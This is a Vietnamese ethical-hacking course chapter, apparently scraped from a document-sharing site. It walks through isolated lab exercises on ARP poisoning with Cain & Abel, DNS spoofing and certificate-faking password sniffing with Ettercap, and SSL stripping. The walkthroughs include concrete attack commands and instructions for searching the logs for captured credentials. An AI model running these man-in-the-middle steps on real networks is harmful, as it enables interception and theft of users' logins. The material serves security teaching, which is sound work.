1. Trang chủ
  2. » Công Nghệ Thông Tin

Chuong 6 module sniffer

17 141 0

Đang tải... (xem toàn văn)

Tài liệu hạn chế xem trước, để xem đầy đủ mời bạn chọn Tải xuống

THÔNG TIN TÀI LIỆU

Thông tin cơ bản

Định dạng
Số trang 17
Dung lượng 1,76 MB

Nội dung

Athena Ethical Hacker Lab Sniffer Module Cain Abel Ettercap DNS Spoofing Sniffer Password SSL Strip Bài: Cain Abel ARP Poisoning Chuẩn bị - PC A:boot vào Windows 2003 Server, cài đặt dịch vụ ftpserver - PC B:boot vào Windows 2003 Server hoặc Windows XP - PC C:boot vào Windows 2003 Server - Sơ đồ lab sau Attacker 100 Victim Router 10 192.168.1.0/24 Mục tiêu Lab - PC B đăng nhập vào PC A (PC A đóng vai trò là FTPServer) bằng mật khẩu - PC C dùng công cụ Cain & Abel thực công MITM nhằm đánh cắp mật truy cập của PC B vào PC A Các bước thực - Bước 1: Cài đặt Cain& Abel Trong trình cài đặt đồng thời cài đặt Winpcap kèm theo Chương trình Winpcap sử dụng để chuyển card mạng sang promicious mode Tài Liệu Học Hacker Mũ Trắng-AEH Tại ATHENA.GV: Lê Đình Nhân - Bước 2: Từ menu chọn Configure/Sniffer chọn card mạng sử dụng nhấn OK - Bước 3: Nhấn nút Start Sniffer Chuyển sang tab Sniffer/Host click chuột phải chọn Scan MAC Address xác định tất máy subnet Tài Liệu Học Hacker Mũ Trắng-AEH Tại ATHENA.GV: Lê Đình Nhân - Bước 4: Chuyển sang tab Sniffer/APR nhấn nút Add to list biểu tượ ng hình dấu cộng màu xanh Ở bên trái chọn máy A, ô bên phải chọn máy B - Click vào Start APR Tài Liệu Học Hacker Mũ Trắng-AEH Tại ATHENA.GV: Lê Đình Nhân - Bước 5: Chuyển sang tab Sniffer/Passwords theo dõi password ftp - Bước 6: Tại PC B đóng vai trò victim, thực ftp vào máy A, hình máy PC C ( attacker ) ta sniffer thông số login PC A Tài Liệu Học Hacker Mũ Trắng-AEH Tại ATHENA.GV: Lê Đình Nhân Bài: Ettercap DNS Spoofing Mục tiêu lab - Tại máy Backtrack thực ARP Poisoning kết hợp với DNS spoofing Khi máy victim nhập vào thơng số www.athena.edu.vn trang web giả - Sơ đồ lab Các bước thực - Bước 1: Cấu hình Web Server hệ điều hành Back Track Đầu tiên ta start dịch vụ apache2 Tài Liệu Học Hacker Mũ Trắng-AEH Tại ATHENA.GV: Lê Đình Nhân Ta vào trình duyệt web http://localhost để kiểm tra xem trang web dịch vụ start - Bước 2: Ta cấu hình trang web có nội dung đơn giản sau Athena Lab

ATHENA DNS SPOOFING LAB - Bước 3: Restart lại service apache2 - Bước 4: Kiểm tra nội dung trang web http:/localhost/index.html Tài Liệu Học Hacker Mũ Trắng-AEH Tại ATHENA.GV: Lê Đình Nhân - Bước 5: Tấn công công cụ ettercap dns_spoof plugin Ta thêm vào số dòng sau vào file /usr/share/ettercap/etter.dns để thay đổi thông số dns client *.athena.edu.vn A 192.168.1.3 www.athena.edu.vn A 192.168.1.3 tailieu.athena.edu.vn A 192.168.1.3 *.athena.edu.vn PTR 192.168.1.3 www.athena.edu.vn PTR 192.168.1.3 tailieu.athena.edu.vn PTR 192.168.1.3 Tài Liệu Học Hacker Mũ Trắng-AEH Tại ATHENA.GV: Lê Đình Nhân Tại máy client thử login vào trang www.athena.edu.vn trước ta thực công ta thấy trang web trả bình thường Sau ta nên sử dụng ipconfig /flushdns để xóa thơng tin dns - Bước 6: Tại máy attacker ta thực công câu lệnh “Ettercap -T -q – M arp:remote –P dns_spoof –i eth0 /192.168.1.11/ // “ Tài Liệu Học Hacker Mũ Trắng-AEH Tại ATHENA.GV: Lê Đình Nhân - Bước 7: Tại máy client ta browser vào lại trang web www.athena.edu.vn vào trang web giả attack dựng lên Tài Liệu Học Hacker Mũ Trắng-AEH Tại ATHENA.GV: Lê Đình Nhân Bài: Ettercap Sniffer Password Mục đích lab - Sử dụng cơng cụ Ettercap thực ARP Poisoning, fake certificate để sniffer password Sử dụng plugin để theo dõi victim duyệt web trang - Sơ đồ lab sau: Các bước thực - Bước 1: cấu hình ettercap file “ etter.conf “ Ta xác định vị trí file etter.conf sau Sử dụng vi gedit để mở file etter.conf Thay đổi giá trị dòng 17 18 Tài Liệu Học Hacker Mũ Trắng-AEH Tại ATHENA.GV: Lê Đình Nhân Thay đổi giá trị dòng 145 Thay đổi giá trị dòng 170 171 - Bước 2: Thực ARP Poisoning attack Máy Victim Window XP có IP 192.168.1.6 Ta nhập vào câu lệnh “ettercap -T -q –M arp:remote –P remote_browser –i eth0 /192.168.1.6/ // ” - Bước 3: máy Victim thực duyệt web Ví dụ victim sử dụng Gmail xuất cảnh báo lỗi certificate Tài Liệu Học Hacker Mũ Trắng-AEH Tại ATHENA.GV: Lê Đình Nhân Tại máy attacker xuất dòng log cho thấy victim kết nối vào mail.google.com Khi Victim cố gắng tiếp tục đăng nhập bị username password Tài Liệu Học Hacker Mũ Trắng-AEH Tại ATHENA.GV: Lê Đình Nhân Tài Liệu Học Hacker Mũ Trắng-AEH Tại ATHENA.GV: Lê Đình Nhân Bài: SSL Strip Mục tiêu lab - SSL Strip công cụ tương tác trình chuyển từ http sang https ứng dụng web SSL Strip công cụ hữu hiệu để capture username password login ứng dụng web - Công cụ SSL Strip install mặc định hệ điều hành Backtrack Đầu tiên ta xác định vị trí file thực thi cách thức sử dụng giao diện dòng lệnh Backtrack - Sơ đồ Lab: Victim login vào web application bị sniffer password Các bước thực #locate sslstrip =>câu lệnh xác định file liên quan đến chương trình ssl strip Ta xác định đường dẫn thực thi /pentest/web/sslstrip #cd /pentest/web/sslstrip/ Tài Liệu Học Hacker Mũ Trắng-AEH Tại ATHENA.GV: Lê Đình Nhân #ls -l -rw-r r root root 4066 2011-05-06 12:22 sslstrip.py #python /sslstrip.py -h =>câu lệnh để ta xem cách thức sử dụng #python /sslstrip.py -a => khởi động chương trình sslstrip ghi log tất kết nối thông qua biến -a => mặc định chương trình sslstrip hoạt động port 10000 #netstat -ltn => xác định port TCP listen máy Ta kiếm vị trí có port 10000 - Các cấu hình chuẩn bị máy Backtrack ( attacker ) #echo > /proc/sys/net/ipv4/ip_forward => kích hoạt khả định tuyến PC #iptables -t nat -A PREROUTING -p TCP destination-port 80 -j REDIRECT toport 10000 =>cấu hình firewall nhận traffic port 80 redirect traffic vào port 10000 Port 10000 tương ứng với chương trình ssl strip - Start sslstrip listen port 10000 ghi log tất kết nối #cd /pentest/web/ssltrip #python /sslstrip.py –a Tài Liệu Học Hacker Mũ Trắng-AEH Tại ATHENA.GV: Lê Đình Nhân - Mở cửa sổ terminal khác thực arp poisoning attacker để redirect tất traffic máy attacker #ettercap -T -q -M arp:remote -i eth0 /192.168.1.X/ // - Tại máy victim thực đăng nhập vào ứng dụng web Sau attacker tìm kiếm thơng tin file sslstrip.log Có thể sử dụng từ khóa Email= , Passwd= … để tìm kiếm thơng tin nhạy cảm #cd /pentest/web/sslstrip #cat sslstrip.log > /root/Desktop/password.txt Tài Liệu Học Hacker Mũ Trắng-AEH Tại ATHENA.GV: Lê Đình Nhân ... *.athena.edu.vn A 192. 168 .1.3 www.athena.edu.vn A 192. 168 .1.3 tailieu.athena.edu.vn A 192. 168 .1.3 *.athena.edu.vn PTR 192. 168 .1.3 www.athena.edu.vn PTR 192. 168 .1.3 tailieu.athena.edu.vn PTR 192. 168 .1.3 Tài... Poisoning attack Máy Victim Window XP có IP 192. 168 .1 .6 Ta nhập vào câu lệnh “ettercap -T -q –M arp:remote –P remote_browser –i eth0 /192. 168 .1 .6/ // ” - Bước 3: máy Victim thực duyệt web Ví dụ... ATHENA.GV: Lê Đình Nhân - Bước 2: Từ menu chọn Configure /Sniffer chọn card mạng sử dụng nhấn OK - Bước 3: Nhấn nút Start Sniffer Chuyển sang tab Sniffer/ Host click chuột phải chọn Scan MAC Address

Ngày đăng: 20/11/2017, 09:17

TỪ KHÓA LIÊN QUAN